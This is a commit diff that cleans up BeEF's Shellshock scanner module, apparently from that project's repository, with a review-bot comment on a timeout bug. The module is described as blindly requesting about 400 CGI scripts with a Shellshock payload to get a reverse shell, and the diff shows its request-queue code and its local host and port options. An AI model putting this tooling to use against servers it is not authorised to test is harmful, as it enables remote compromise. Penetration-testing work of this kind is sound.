Module clean up

Brendan Coles
2015-01-06 10:27:10 +00:00
parent a9833fd538
commit 8a8ea35265
3 changed files with 8 additions and 11 deletions


@@ -13,7 +13,6 @@ beef.execute(function() {
var target = rproto + '://' + rhost + ':' + rport;
var method = '<%= @method %>';
var wait = '<%= @wait %>';
var timeout = '<%= @timeout %>';
get_cgi = function(uri) {
try {
@@ -34,7 +33,8 @@ beef.execute(function() {
}
}
var scripts = new Array(
// add scripts to queue
var requests = new Array(
<%=
scripts = []
File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle|
@@ -49,12 +49,10 @@ beef.execute(function() {
%>
);
// add scripts to queue
var requests = [];
for (var i=0; i<scripts.length; i++) requests.push(scripts[i]);
// process queue
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan");
beef.debug("[command #<%= @command_id %>] Starting Shellshock scan of "+target+" ("+requests.length+" URLs)");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan of "+target+" ("+requests.length+" URLs)");
var timeout = wait * requests.length + 10;
var handle = setInterval(function() {
if (requests.length > 0) {
get_cgi(requests.pop());
@@ -64,7 +62,7 @@ beef.execute(function() {
// clean up
cleanup = function() {
if (handle) {
beef.debug("Killing timer [ID: " + handle + "]");
beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]");
clearInterval(handle);
handle = 0;
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
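Review bot: The new `var timeout = wait * requests.length + 10;` in the third hunk depends on implicit string-to-number coercion, because `wait` is still assigned from the quoted template value `'<%= @wait %>'`. A non-numeric or empty value in the "Wait between requests" field makes the product NaN, and whatever consumes `timeout` (not visible in these hunks) then receives NaN; if that is a timer delay, the clean-up would presumably run at once instead of after the scan. I would parse the value where it is declared, `var wait = parseFloat('<%= @wait %>');`, and guard it with `if (isNaN(wait) || wait < 0) wait = 0.3;` so the computed timeout always matches the request pacing. The enclosing `beef.execute` callback starts and ends outside the hunks shown, so the interval and timeout calls themselves could not be checked.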


@@ -9,7 +9,7 @@ beef:
enable: true
category: "Exploits"
name: "Shell Shock Scanner (Reverse Shell)"
description: "This module attempts to get a reverse shell on the specified web server, blindly, by requesting ~400 potentially vulnerable CGI scripts. Each CGI is requested with a shellshock payload in the 'Accept' HTTP header.<br/>The list of CGI scripts was taken from <a href='https://github.com/nccgroup/shocker'>Shocker</a>."
description: "This module attempts to get a reverse shell on the specified web server, blindly, by requesting ~400 potentially vulnerable CGI scripts. Each CGI is requested with a shellshock payload in the 'Accept' HTTP header.<br/>The list of CGI scripts was taken from <a href='https://github.com/nccgroup/shocker'>Shocker</a>.<br/><br/>The scan will take about 2 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below."
authors: ["Stephane Chazelas", "mz", "bmantra", "radoen", "bcoles"]
target:
working: ["ALL"]


@@ -30,8 +30,7 @@ class Shell_shock_scanner < BeEF::Core::Command
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost },
{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' },
{ 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' },
{ 'name' => 'timeout', 'ui_label' => 'Scan timeout (s)', 'value' => '180'}
{ 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' }
]
end